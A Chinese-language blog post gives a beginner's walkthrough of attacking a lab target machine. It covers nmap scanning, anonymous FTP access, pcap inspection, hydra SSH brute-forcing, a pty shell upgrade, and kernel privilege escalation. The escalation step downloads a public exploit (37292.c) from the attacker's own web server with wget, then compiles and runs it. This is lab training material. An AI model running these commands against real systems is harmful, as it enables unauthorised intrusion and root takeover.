一次零基础靶机渗透细节全程记录

╰+攻爆jí腚メ 2023-10-13 15:53 22阅读 0赞

# 一、打靶总流程 #

## 1.确定目标： ##

在本靶场中，确定目标就是使用nmap进行ip扫描，确定ip即为目标，只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描，但不局限于这个nmap。

## 2.信息收集： ##

比如平常挖洞使用fofa，天眼查，ip域名等进行查，在我们这个靶场中比如信息收集包括查看源码，使用工具dirb等。

## 3.发现漏洞： ##

那些理论比如sql注入，文件上传等，或者找到相关的系统信息，去网上找相关的exp这些都是为了拿到webshell。

## 4.漏洞利用： ##

漏洞利用就是使用漏洞拿到webshell。

## 5.权限提升： ##

权限提升，就是所谓的提权，因为一般进入拿到webshell后进入到服务器了都是低权限，在接下来的靶中我们的目标都是拿到root权限，所以拿到webshell后是低权限用户，这个时候我们需要一系列的方式进行提权，最后拿到root权限，即为结束。

# 二、打靶实例详解 #

--------------------

###### 文章内的靶机及脚本关注后私信获取 ######

--------------------

### 1.首先将靶机以及kali启动。 ###

![0a95400188734ec6894c37dc698043e7.png][]

### 2.注意将两者的网络适配器均调整为NAT模式（确保二者是在同一个网段下）。 ###

![d785567f2c25477d912ee8ff13b41082.png][]

### 3.从kali中打开终端，执行ip a命令查看kali的ip地址。 ###

![c1c2e0cdb665403d801860504bf11179.png][]

### 4.使用nmap工具来确认要打的靶机的ip地址。 ###

nmap -sP 192.168.190.0/24

![a0d61729a1fb4770a9fc711f90e07c6a.png][]

在上面扫描出的ip地址中，.1、.2、.254、.138都是kali自身的一些ip地址，所以在此确认要进行攻击的靶机的ip地址为：192.168.190.139。

### 5.接下来继续进行信息收集，信息收集的方面以及方式有很多，这里信息收集是针对此靶机的信息收集。 ###

### 6.扫描靶机开放了哪些端口。 ###

nmap -p- 192.168.190.139

![d2fa07ccd86e44a6ab4880f1315dd441.png][]

可以看到此靶机开放了21、22、80端口。其中：开放了21端口ftp，可以想到可能存在弱口令；开放了22端口ssh，可以想到对其进行爆破，然后看到80端口web端，可以对其进行常见漏洞测试。

### 7.对开放的各个端口的进行详细查看。 ###

nmap -p- -sS -sV -A 192.168.190.139

![c29ab9602a11400b8f44ce6795fe82a2.png][]

### 8. 在各个端口的详细信息中，可以看到21端口有个Anonymous登入成功过，因此可以尝试进行弱口令登入，账户名和密码都输入为Anonymous进行尝试。 ###

![04db8120c74e40dab7e65333f94f1c34.png][]

### 9.尝试后发现确实存在弱口令问题，成功登录了进去。 ###

![920ae2f6ef5c4a7da5071efe83b3b604.png][]

### 10.登录进去之后执行ls命令查看当前目录下有哪些文件，来继续进行信息收集。 ###

![2e99ac4d49894eb3b59ac5213da340c8.png][]

### 11.发现一个名为“lol.pcap”的文件，我们将其下载到我们本地。 ###

![438237488bdd48318954fdecc395fc45.png][]

### 12.发现是一个流量数据，因此使用wireshark工具对其进行打开。 ###

![d90e436b828c4dd2bdf5e86a5521bc73.png][]

### 13.打开后可以看到下面的内容。 ###

![2f18dfe9259e4ecab200cfcd851738da.png][]

### 14.我们随便点击一条流量数据，点击TCP追踪流，可以看到下面的信息，但是并没有发现有用的信息。 ###

![dc39f62a7b9e4e83b2106a6fcd42e599.png][]

### 15. 将其关闭后我们可以看到软件上方的筛选信息，此时为0。 ###

![1522758579fb4e53b412d4dd7e1c9764.png][]

### 16.将其更改成1后再进行TCP流追踪，可以看到一个txt文件。 ###

![93b2c0c659c642cda7cb8d0775d64fcf.png][]

### 17.此时想到最开始进行扫描的时候，靶机存在开放的80端口，因此想到对其进行搜索，发现搜索结果返回404，说明搜索的结果是没用的。 ###

![328cc4b4c75e4f7ebe3f286bbe0328cb.png][]

### 18.回到流量工具内，将筛选框后面的1更改为2后继续追踪TCP流，根据其英文解释，可以想到“sup3rs3cr3tdirlol”可能是一个文件的路径，因此再次尝试进行拼接。 ###

![4efbab573f3440b1b6c68169b32040a8.png][]

### 19.拼接后网页返回了下面的内容。 ###

![78b3e872632c4ee5bbbe6e9b02025613.png][]

### 20.可以看到存在一个名为“roflmao”的文件，点击后将其下载下来。 ###

![1191880f0b024a82af1770379acfdf1e.png][]

### 21.来到下载路径下后，使用file命令或者strings命令将文件打开。 ###

![575140e64ffd43fa82e502a1d304840d.png][]

### 22.可以看到还原出来的内容里存在下面的一句话，因此我们尝试将获得的信息再次进行拼接后搜索。 ###

![d92105cb8cdd46059a2783382d83ded2.png][]

### 23.再次进行拼接搜索后进入了下面的页面。 ###

![6d458cc3b5624147801cfda8de2f53cc.png][]

### 24.在这里点击“good\_luck”后进入了到了下面的页面。 ###

![be93fc24f3214d9495e5781074216a05.png][]

### 25. 在此页面内又发现了一个txt文件，点击后可以看到下面的内容，这里就相当于是一个用户名的字典，找到了有用的用户名。 ###

![28e22965b3be4d08a7875a5b5f0578a6.png][]

### 26.在桌面上创建一个名为user的文档来存储这些用户名。 ###

![0b78b90d29c14c5da7477971daa73e92.png][]

### 27.回到浏览器的前面的页面，发现存在一个可能存在密码的文件。 ###

![f53d477e88bd41108423aecde7211d4a.png][]

### 28.进入后又发现了一个txt文件，打开后可以看到下面的内容，因此可以想到密码有可能是Good\_job\_:)也有可能是Pass.txt。 ###

![b7fdbcdc7a324f0284d83a9ebacb6381.png][]

### 29.将猜想的可能的密码也放入一个txt文档中当作密码的字典。 ###

### ![318c9d15e02044789a1555cdf3492ec2.png][] ###

### 30. 来到桌面路径下使用hydra工具对其进行爆破，可以看到成功将用户名和密码爆破了出来。 ###

hydra -L user -P password 192.168.190.139 ssh

![017fc70ad5ba4ba3a9a1287910336866.png][]

### 31.接下来就使用爆破出来的用户名和密码进行登录，发现登录成功了。 ###

ssh overflow@192.168.190.139

![d8b0b785fd0a46298560dc05d8b4a957.png][]

### 32.但是发现此时的权限是低权限： ###

*  id为:0 root
 *  0 < id < 1000 服务用户： 为服务提供权限
 *  1000 <= id <=60000 普通

因此还要进行提权，下面是linux提权的几种方式：

*  内核提权---脏牛提权最为典型 ，内核提权一般包括3个步骤，信息收集发现版本号，找到相关版本的exp，使用找到的exp对目标发起攻击，完成提权功能。
 *  利用suid提权
 *  利用sudo提权
 *  mfs提权
 *  mysql提权 包括udf mof提权方式

### 33.发现进入的是一个伪终端，因此还要将其转换为真终端，执行下面的命令就将其变成了真终端。 ###

python -c 'import pty; pty.spawn("/bin/bash")'

![19a475cec2fa4749a1482f9689f5c845.png][]

### 34.接下来开始提权。 ###

### 35.首先在本地开启一个web服务。 ###

python3 -m http.server 8083

![df2c9e9400534d8cb3079b280bad37cb.png][]

### 35. 直接执行下面的命令将脚本文件下载到靶机上，但是发现下载失败了，因为此时权限不够。 ###

wget http://192.168.190.138:8083/les.sh

![bead2308466549ca82552ecb9a88e716.png][]

### 36.切换到tmp目录下再次进行下载，发现下载成功了，因为其是一个临时文件，所以在此目录下的权限会高一些，因此就可以成功下载了。 ###

![0b81060396164975b0b298f7b3f2d4ce.png][]

### 37.下载完之后将web服务关闭，在终端内按CTRL+z。 ###

![35ac50edb35e4181872aa8bc4da94ee1.png][]

### 38.给其添加一个权限后进行执行。 ###

chmod +x les.sh
    
    ./les.sh

![e1d7513cc8fa4de0998f53052efdb6d3.png][]

### 39. 这个脚本执行后会检测Linux内核版本存在哪些漏洞，检测出来的结果的颜色越深说明可以被利用的可能性越大。 ###

![82961f9745a54491b9084f103bf2dcef.png][]

### 40.接下来进行exp的利用就可以了。 ###

### 41.下面演示第二种提权方式。 ###

### 42.可以通过自己获取到Linux的版本信息，然后在kali内进行搜索。 ###

uname -a

![cc4bfc903f9041c3a84b5a409fce3cef.png][]

### 43.获取到版本信息后执行下面的命令在kali内进行搜索。 ###

searchsploit Linux 4-Tr0ll 3.13.0

![750f0bc4a85f4bea9e739dfc6458afe6.png][]

### 44.在此标红的两条就是满足条件的。 ###

![deb6076d74484374b25fb04595157e8f.png][]

### 45.接下来的思路就是将本都的exp搞到靶机的服务器内进行运行，就可以实现提权的效果。 ###

### 46.获取到exp的绝对路径。 ###

locate linux/local/37292.c

![723bc8a456034f5ca60da499034b5d29.png][]

### 47.将其存放在桌面。 ###

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面

![cad37aa533de4ac1ac8858c0fa167b21.png][]

### 48.将其打开后就可以看到exp的内容。 ###

![2b452ee7e5c04906b5d0ee12cbcb2280.png][]

### 49. 再从本地开启web服务。 ###

#### ![b22c581777f24a0885847f17fb21a61c.png][] ####

### 50. 将exp下载到靶机。 ###

wget http://192.168.190.138:8085/37292.c

![a07f1384e98e4ab891df772cb1fe871e.png][]

### 51.下载完之后将web服务关闭，在终端内按CTRL+z。 ###

![df110627a8bb4017aba6246eba96fee0.png][]

### 52.将其进行编译和执行，此时再次查看权限，可以看到此时的权限就是root权限了。 ###

![40a784ea445649199ab7be61ba2bb7a5.png][]

### 53.查看靶机内的文件proof.txt,至此我们就成功拿下了靶机！！！ ###

![793a391b75a24e448304bb9fc78b2fc9.png][]

[0a95400188734ec6894c37dc698043e7.png]: https://img-blog.csdnimg.cn/0a95400188734ec6894c37dc698043e7.png
[d785567f2c25477d912ee8ff13b41082.png]: https://img-blog.csdnimg.cn/d785567f2c25477d912ee8ff13b41082.png
[c1c2e0cdb665403d801860504bf11179.png]: https://img-blog.csdnimg.cn/c1c2e0cdb665403d801860504bf11179.png
[a0d61729a1fb4770a9fc711f90e07c6a.png]: https://img-blog.csdnimg.cn/a0d61729a1fb4770a9fc711f90e07c6a.png
[d2fa07ccd86e44a6ab4880f1315dd441.png]: https://img-blog.csdnimg.cn/d2fa07ccd86e44a6ab4880f1315dd441.png
[c29ab9602a11400b8f44ce6795fe82a2.png]: https://img-blog.csdnimg.cn/c29ab9602a11400b8f44ce6795fe82a2.png
[04db8120c74e40dab7e65333f94f1c34.png]: https://img-blog.csdnimg.cn/04db8120c74e40dab7e65333f94f1c34.png
[920ae2f6ef5c4a7da5071efe83b3b604.png]: https://img-blog.csdnimg.cn/920ae2f6ef5c4a7da5071efe83b3b604.png
[2e99ac4d49894eb3b59ac5213da340c8.png]: https://img-blog.csdnimg.cn/2e99ac4d49894eb3b59ac5213da340c8.png
[438237488bdd48318954fdecc395fc45.png]: https://img-blog.csdnimg.cn/438237488bdd48318954fdecc395fc45.png
[d90e436b828c4dd2bdf5e86a5521bc73.png]: https://img-blog.csdnimg.cn/d90e436b828c4dd2bdf5e86a5521bc73.png
[2f18dfe9259e4ecab200cfcd851738da.png]: https://img-blog.csdnimg.cn/2f18dfe9259e4ecab200cfcd851738da.png
[dc39f62a7b9e4e83b2106a6fcd42e599.png]: https://img-blog.csdnimg.cn/dc39f62a7b9e4e83b2106a6fcd42e599.png
[1522758579fb4e53b412d4dd7e1c9764.png]: https://img-blog.csdnimg.cn/1522758579fb4e53b412d4dd7e1c9764.png
[93b2c0c659c642cda7cb8d0775d64fcf.png]: https://img-blog.csdnimg.cn/93b2c0c659c642cda7cb8d0775d64fcf.png
[328cc4b4c75e4f7ebe3f286bbe0328cb.png]: https://img-blog.csdnimg.cn/328cc4b4c75e4f7ebe3f286bbe0328cb.png
[4efbab573f3440b1b6c68169b32040a8.png]: https://img-blog.csdnimg.cn/4efbab573f3440b1b6c68169b32040a8.png
[78b3e872632c4ee5bbbe6e9b02025613.png]: https://img-blog.csdnimg.cn/78b3e872632c4ee5bbbe6e9b02025613.png
[1191880f0b024a82af1770379acfdf1e.png]: https://img-blog.csdnimg.cn/1191880f0b024a82af1770379acfdf1e.png
[575140e64ffd43fa82e502a1d304840d.png]: https://img-blog.csdnimg.cn/575140e64ffd43fa82e502a1d304840d.png
[d92105cb8cdd46059a2783382d83ded2.png]: https://img-blog.csdnimg.cn/d92105cb8cdd46059a2783382d83ded2.png
[6d458cc3b5624147801cfda8de2f53cc.png]: https://img-blog.csdnimg.cn/6d458cc3b5624147801cfda8de2f53cc.png
[be93fc24f3214d9495e5781074216a05.png]: https://img-blog.csdnimg.cn/be93fc24f3214d9495e5781074216a05.png
[28e22965b3be4d08a7875a5b5f0578a6.png]: https://img-blog.csdnimg.cn/28e22965b3be4d08a7875a5b5f0578a6.png
[0b78b90d29c14c5da7477971daa73e92.png]: https://img-blog.csdnimg.cn/0b78b90d29c14c5da7477971daa73e92.png
[f53d477e88bd41108423aecde7211d4a.png]: https://img-blog.csdnimg.cn/f53d477e88bd41108423aecde7211d4a.png
[b7fdbcdc7a324f0284d83a9ebacb6381.png]: https://img-blog.csdnimg.cn/b7fdbcdc7a324f0284d83a9ebacb6381.png
[318c9d15e02044789a1555cdf3492ec2.png]: https://img-blog.csdnimg.cn/318c9d15e02044789a1555cdf3492ec2.png
[017fc70ad5ba4ba3a9a1287910336866.png]: https://img-blog.csdnimg.cn/017fc70ad5ba4ba3a9a1287910336866.png
[d8b0b785fd0a46298560dc05d8b4a957.png]: https://img-blog.csdnimg.cn/d8b0b785fd0a46298560dc05d8b4a957.png
[19a475cec2fa4749a1482f9689f5c845.png]: https://img-blog.csdnimg.cn/19a475cec2fa4749a1482f9689f5c845.png
[df2c9e9400534d8cb3079b280bad37cb.png]: https://img-blog.csdnimg.cn/df2c9e9400534d8cb3079b280bad37cb.png
[bead2308466549ca82552ecb9a88e716.png]: https://img-blog.csdnimg.cn/bead2308466549ca82552ecb9a88e716.png
[0b81060396164975b0b298f7b3f2d4ce.png]: https://img-blog.csdnimg.cn/0b81060396164975b0b298f7b3f2d4ce.png
[35ac50edb35e4181872aa8bc4da94ee1.png]: https://img-blog.csdnimg.cn/35ac50edb35e4181872aa8bc4da94ee1.png
[e1d7513cc8fa4de0998f53052efdb6d3.png]: https://img-blog.csdnimg.cn/e1d7513cc8fa4de0998f53052efdb6d3.png
[82961f9745a54491b9084f103bf2dcef.png]: https://img-blog.csdnimg.cn/82961f9745a54491b9084f103bf2dcef.png
[cc4bfc903f9041c3a84b5a409fce3cef.png]: https://img-blog.csdnimg.cn/cc4bfc903f9041c3a84b5a409fce3cef.png
[750f0bc4a85f4bea9e739dfc6458afe6.png]: https://img-blog.csdnimg.cn/750f0bc4a85f4bea9e739dfc6458afe6.png
[deb6076d74484374b25fb04595157e8f.png]: https://img-blog.csdnimg.cn/deb6076d74484374b25fb04595157e8f.png
[723bc8a456034f5ca60da499034b5d29.png]: https://img-blog.csdnimg.cn/723bc8a456034f5ca60da499034b5d29.png
[cad37aa533de4ac1ac8858c0fa167b21.png]: https://img-blog.csdnimg.cn/cad37aa533de4ac1ac8858c0fa167b21.png
[2b452ee7e5c04906b5d0ee12cbcb2280.png]: https://img-blog.csdnimg.cn/2b452ee7e5c04906b5d0ee12cbcb2280.png
[b22c581777f24a0885847f17fb21a61c.png]: https://img-blog.csdnimg.cn/b22c581777f24a0885847f17fb21a61c.png
[a07f1384e98e4ab891df772cb1fe871e.png]: https://img-blog.csdnimg.cn/a07f1384e98e4ab891df772cb1fe871e.png
[df110627a8bb4017aba6246eba96fee0.png]: https://img-blog.csdnimg.cn/df110627a8bb4017aba6246eba96fee0.png
[40a784ea445649199ab7be61ba2bb7a5.png]: https://img-blog.csdnimg.cn/40a784ea445649199ab7be61ba2bb7a5.png
[793a391b75a24e448304bb9fc78b2fc9.png]: https://img-blog.csdnimg.cn/793a391b75a24e448304bb9fc78b2fc9.png